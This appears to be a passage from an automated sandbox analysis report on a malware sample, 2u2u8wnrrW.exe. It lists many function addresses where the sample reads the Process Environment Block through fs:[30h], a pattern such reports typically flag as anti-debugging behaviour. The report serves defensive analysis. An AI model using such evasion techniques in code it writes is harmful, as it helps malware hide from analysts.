          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D3D34 mov eax, dword ptr fs:[00000030h]3_2_012D3D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CAD30 mov eax, dword ptr fs:[00000030h]3_2_012CAD30
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C9100 mov eax, dword ptr fs:[00000030h]3_2_012C9100
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C9100 mov eax, dword ptr fs:[00000030h]3_2_012C9100
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C9100 mov eax, dword ptr fs:[00000030h]3_2_012C9100
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CC962 mov eax, dword ptr fs:[00000030h]3_2_012CC962
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EC577 mov eax, dword ptr fs:[00000030h]3_2_012EC577
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EC577 mov eax, dword ptr fs:[00000030h]3_2_012EC577
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CB171 mov eax, dword ptr fs:[00000030h]3_2_012CB171
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CB171 mov eax, dword ptr fs:[00000030h]3_2_012CB171
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EB944 mov eax, dword ptr fs:[00000030h]3_2_012EB944
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EB944 mov eax, dword ptr fs:[00000030h]3_2_012EB944
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01303D43 mov eax, dword ptr fs:[00000030h]3_2_01303D43
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01343540 mov eax, dword ptr fs:[00000030h]3_2_01343540
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E7D50 mov eax, dword ptr fs:[00000030h]3_2_012E7D50
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013451BE mov eax, dword ptr fs:[00000030h]3_2_013451BE
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013451BE mov eax, dword ptr fs:[00000030h]3_2_013451BE
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013451BE mov eax, dword ptr fs:[00000030h]3_2_013451BE
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013451BE mov eax, dword ptr fs:[00000030h]3_2_013451BE
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F35A1 mov eax, dword ptr fs:[00000030h]3_2_012F35A1
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F61A0 mov eax, dword ptr fs:[00000030h]3_2_012F61A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F61A0 mov eax, dword ptr fs:[00000030h]3_2_012F61A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013469A6 mov eax, dword ptr fs:[00000030h]3_2_013469A6
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013905AC mov eax, dword ptr fs:[00000030h]3_2_013905AC
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013905AC mov eax, dword ptr fs:[00000030h]3_2_013905AC
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F1DB5 mov eax, dword ptr fs:[00000030h]3_2_012F1DB5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F1DB5 mov eax, dword ptr fs:[00000030h]3_2_012F1DB5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F1DB5 mov eax, dword ptr fs:[00000030h]3_2_012F1DB5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C2D8A mov eax, dword ptr fs:[00000030h]3_2_012C2D8A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C2D8A mov eax, dword ptr fs:[00000030h]3_2_012C2D8A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C2D8A mov eax, dword ptr fs:[00000030h]3_2_012C2D8A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C2D8A mov eax, dword ptr fs:[00000030h]3_2_012C2D8A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C2D8A mov eax, dword ptr fs:[00000030h]3_2_012C2D8A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FA185 mov eax, dword ptr fs:[00000030h]3_2_012FA185
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EC182 mov eax, dword ptr fs:[00000030h]3_2_012EC182
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F2581 mov eax, dword ptr fs:[00000030h]3_2_012F2581
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F2581 mov eax, dword ptr fs:[00000030h]3_2_012F2581
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F2581 mov eax, dword ptr fs:[00000030h]3_2_012F2581
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F2581 mov eax, dword ptr fs:[00000030h]3_2_012F2581
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FFD9B mov eax, dword ptr fs:[00000030h]3_2_012FFD9B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FFD9B mov eax, dword ptr fs:[00000030h]3_2_012FFD9B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F2990 mov eax, dword ptr fs:[00000030h]3_2_012F2990
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01378DF1 mov eax, dword ptr fs:[00000030h]3_2_01378DF1
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CB1E1 mov eax, dword ptr fs:[00000030h]3_2_012CB1E1
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CB1E1 mov eax, dword ptr fs:[00000030h]3_2_012CB1E1
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CB1E1 mov eax, dword ptr fs:[00000030h]3_2_012CB1E1
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DD5E0 mov eax, dword ptr fs:[00000030h]3_2_012DD5E0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DD5E0 mov eax, dword ptr fs:[00000030h]3_2_012DD5E0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138FDE2 mov eax, dword ptr fs:[00000030h]3_2_0138FDE2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138FDE2 mov eax, dword ptr fs:[00000030h]3_2_0138FDE2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138FDE2 mov eax, dword ptr fs:[00000030h]3_2_0138FDE2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138FDE2 mov eax, dword ptr fs:[00000030h]3_2_0138FDE2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013541E8 mov eax, dword ptr fs:[00000030h]3_2_013541E8
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346DC9 mov eax, dword ptr fs:[00000030h]3_2_01346DC9
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346DC9 mov eax, dword ptr fs:[00000030h]3_2_01346DC9
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346DC9 mov eax, dword ptr fs:[00000030h]3_2_01346DC9
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346DC9 mov ecx, dword ptr fs:[00000030h]3_2_01346DC9
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346DC9 mov eax, dword ptr fs:[00000030h]3_2_01346DC9
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346DC9 mov eax, dword ptr fs:[00000030h]3_2_01346DC9
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F002D mov eax, dword ptr fs:[00000030h]3_2_012F002D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F002D mov eax, dword ptr fs:[00000030h]3_2_012F002D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F002D mov eax, dword ptr fs:[00000030h]3_2_012F002D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F002D mov eax, dword ptr fs:[00000030h]3_2_012F002D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F002D mov eax, dword ptr fs:[00000030h]3_2_012F002D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FBC2C mov eax, dword ptr fs:[00000030h]3_2_012FBC2C
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DB02A mov eax, dword ptr fs:[00000030h]3_2_012DB02A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DB02A mov eax, dword ptr fs:[00000030h]3_2_012DB02A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DB02A mov eax, dword ptr fs:[00000030h]3_2_012DB02A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DB02A mov eax, dword ptr fs:[00000030h]3_2_012DB02A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01347016 mov eax, dword ptr fs:[00000030h]3_2_01347016
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01347016 mov eax, dword ptr fs:[00000030h]3_2_01347016
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01347016 mov eax, dword ptr fs:[00000030h]3_2_01347016
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01394015 mov eax, dword ptr fs:[00000030h]3_2_01394015
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01394015 mov eax, dword ptr fs:[00000030h]3_2_01394015
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0139740D mov eax, dword ptr fs:[00000030h]3_2_0139740D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0139740D mov eax, dword ptr fs:[00000030h]3_2_0139740D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0139740D mov eax, dword ptr fs:[00000030h]3_2_0139740D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381C06 mov eax, dword ptr fs:[00000030h]3_2_01381C06
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346C0A mov eax, dword ptr fs:[00000030h]3_2_01346C0A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346C0A mov eax, dword ptr fs:[00000030h]3_2_01346C0A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346C0A mov eax, dword ptr fs:[00000030h]3_2_01346C0A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346C0A mov eax, dword ptr fs:[00000030h]3_2_01346C0A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E746D mov eax, dword ptr fs:[00000030h]3_2_012E746D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01382073 mov eax, dword ptr fs:[00000030h]3_2_01382073
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01391074 mov eax, dword ptr fs:[00000030h]3_2_01391074
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FA44B mov eax, dword ptr fs:[00000030h]3_2_012FA44B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135C450 mov eax, dword ptr fs:[00000030h]3_2_0135C450
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135C450 mov eax, dword ptr fs:[00000030h]3_2_0135C450
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E0050 mov eax, dword ptr fs:[00000030h]3_2_012E0050
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E0050 mov eax, dword ptr fs:[00000030h]3_2_012E0050
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F20A0 mov eax, dword ptr fs:[00000030h]3_2_012F20A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F20A0 mov eax, dword ptr fs:[00000030h]3_2_012F20A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F20A0 mov eax, dword ptr fs:[00000030h]3_2_012F20A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F20A0 mov eax, dword ptr fs:[00000030h]3_2_012F20A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F20A0 mov eax, dword ptr fs:[00000030h]3_2_012F20A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F20A0 mov eax, dword ptr fs:[00000030h]3_2_012F20A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FF0BF mov ecx, dword ptr fs:[00000030h]3_2_012FF0BF
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FF0BF mov eax, dword ptr fs:[00000030h]3_2_012FF0BF
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FF0BF mov eax, dword ptr fs:[00000030h]3_2_012FF0BF
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013090AF mov eax, dword ptr fs:[00000030h]3_2_013090AF
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C9080 mov eax, dword ptr fs:[00000030h]3_2_012C9080
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01343884 mov eax, dword ptr fs:[00000030h]3_2_01343884
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01343884 mov eax, dword ptr fs:[00000030h]3_2_01343884
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D849B mov eax, dword ptr fs:[00000030h]3_2_012D849B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C58EC mov eax, dword ptr fs:[00000030h]3_2_012C58EC
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013814FB mov eax, dword ptr fs:[00000030h]3_2_013814FB
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346CF0 mov eax, dword ptr fs:[00000030h]3_2_01346CF0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346CF0 mov eax, dword ptr fs:[00000030h]3_2_01346CF0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01346CF0 mov eax, dword ptr fs:[00000030h]3_2_01346CF0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135B8D0 mov eax, dword ptr fs:[00000030h]3_2_0135B8D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135B8D0 mov ecx, dword ptr fs:[00000030h]3_2_0135B8D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135B8D0 mov eax, dword ptr fs:[00000030h]3_2_0135B8D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135B8D0 mov eax, dword ptr fs:[00000030h]3_2_0135B8D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135B8D0 mov eax, dword ptr fs:[00000030h]3_2_0135B8D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135B8D0 mov eax, dword ptr fs:[00000030h]3_2_0135B8D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01398CD6 mov eax, dword ptr fs:[00000030h]3_2_01398CD6
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C4F2E mov eax, dword ptr fs:[00000030h]3_2_012C4F2E
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C4F2E mov eax, dword ptr fs:[00000030h]3_2_012C4F2E
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FE730 mov eax, dword ptr fs:[00000030h]3_2_012FE730
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FA70E mov eax, dword ptr fs:[00000030h]3_2_012FA70E
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FA70E mov eax, dword ptr fs:[00000030h]3_2_012FA70E
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138131B mov eax, dword ptr fs:[00000030h]3_2_0138131B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135FF10 mov eax, dword ptr fs:[00000030h]3_2_0135FF10
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135FF10 mov eax, dword ptr fs:[00000030h]3_2_0135FF10
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0139070D mov eax, dword ptr fs:[00000030h]3_2_0139070D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0139070D mov eax, dword ptr fs:[00000030h]3_2_0139070D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EF716 mov eax, dword ptr fs:[00000030h]3_2_012EF716
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CDB60 mov ecx, dword ptr fs:[00000030h]3_2_012CDB60
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DFF60 mov eax, dword ptr fs:[00000030h]3_2_012DFF60
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01398F6A mov eax, dword ptr fs:[00000030h]3_2_01398F6A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F3B7A mov eax, dword ptr fs:[00000030h]3_2_012F3B7A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F3B7A mov eax, dword ptr fs:[00000030h]3_2_012F3B7A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01398B58 mov eax, dword ptr fs:[00000030h]3_2_01398B58
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CDB40 mov eax, dword ptr fs:[00000030h]3_2_012CDB40
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DEF40 mov eax, dword ptr fs:[00000030h]3_2_012DEF40
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CF358 mov eax, dword ptr fs:[00000030h]3_2_012CF358
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F4BAD mov eax, dword ptr fs:[00000030h]3_2_012F4BAD
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F4BAD mov eax, dword ptr fs:[00000030h]3_2_012F4BAD
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F4BAD mov eax, dword ptr fs:[00000030h]3_2_012F4BAD
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01395BA5 mov eax, dword ptr fs:[00000030h]3_2_01395BA5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01347794 mov eax, dword ptr fs:[00000030h]3_2_01347794
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01347794 mov eax, dword ptr fs:[00000030h]3_2_01347794
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01347794 mov eax, dword ptr fs:[00000030h]3_2_01347794
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D1B8F mov eax, dword ptr fs:[00000030h]3_2_012D1B8F
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D1B8F mov eax, dword ptr fs:[00000030h]3_2_012D1B8F
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138138A mov eax, dword ptr fs:[00000030h]3_2_0138138A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0137D380 mov ecx, dword ptr fs:[00000030h]3_2_0137D380
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F2397 mov eax, dword ptr fs:[00000030h]3_2_012F2397
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D8794 mov eax, dword ptr fs:[00000030h]3_2_012D8794
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FB390 mov eax, dword ptr fs:[00000030h]3_2_012FB390
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013037F5 mov eax, dword ptr fs:[00000030h]3_2_013037F5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EDBE9 mov eax, dword ptr fs:[00000030h]3_2_012EDBE9
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F03E2 mov eax, dword ptr fs:[00000030h]3_2_012F03E2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F03E2 mov eax, dword ptr fs:[00000030h]3_2_012F03E2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F03E2 mov eax, dword ptr fs:[00000030h]3_2_012F03E2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F03E2 mov eax, dword ptr fs:[00000030h]3_2_012F03E2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F03E2 mov eax, dword ptr fs:[00000030h]3_2_012F03E2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F03E2 mov eax, dword ptr fs:[00000030h]3_2_012F03E2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013453CA mov eax, dword ptr fs:[00000030h]3_2_013453CA
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013453CA mov eax, dword ptr fs:[00000030h]3_2_013453CA
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0137FE3F mov eax, dword ptr fs:[00000030h]3_2_0137FE3F
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CE620 mov eax, dword ptr fs:[00000030h]3_2_012CE620
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01304A2C mov eax, dword ptr fs:[00000030h]3_2_01304A2C
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01304A2C mov eax, dword ptr fs:[00000030h]3_2_01304A2C
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D8A0A mov eax, dword ptr fs:[00000030h]3_2_012D8A0A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CC600 mov eax, dword ptr fs:[00000030h]3_2_012CC600
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CC600 mov eax, dword ptr fs:[00000030h]3_2_012CC600
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CC600 mov eax, dword ptr fs:[00000030h]3_2_012CC600
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F8E00 mov eax, dword ptr fs:[00000030h]3_2_012F8E00
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01381608 mov eax, dword ptr fs:[00000030h]3_2_01381608
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E3A1C mov eax, dword ptr fs:[00000030h]3_2_012E3A1C
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FA61C mov eax, dword ptr fs:[00000030h]3_2_012FA61C
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FA61C mov eax, dword ptr fs:[00000030h]3_2_012FA61C
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CAA16 mov eax, dword ptr fs:[00000030h]3_2_012CAA16
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CAA16 mov eax, dword ptr fs:[00000030h]3_2_012CAA16
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C5210 mov eax, dword ptr fs:[00000030h]3_2_012C5210
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C5210 mov ecx, dword ptr fs:[00000030h]3_2_012C5210
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C5210 mov eax, dword ptr fs:[00000030h]3_2_012C5210
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C5210 mov eax, dword ptr fs:[00000030h]3_2_012C5210
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D766D mov eax, dword ptr fs:[00000030h]3_2_012D766D
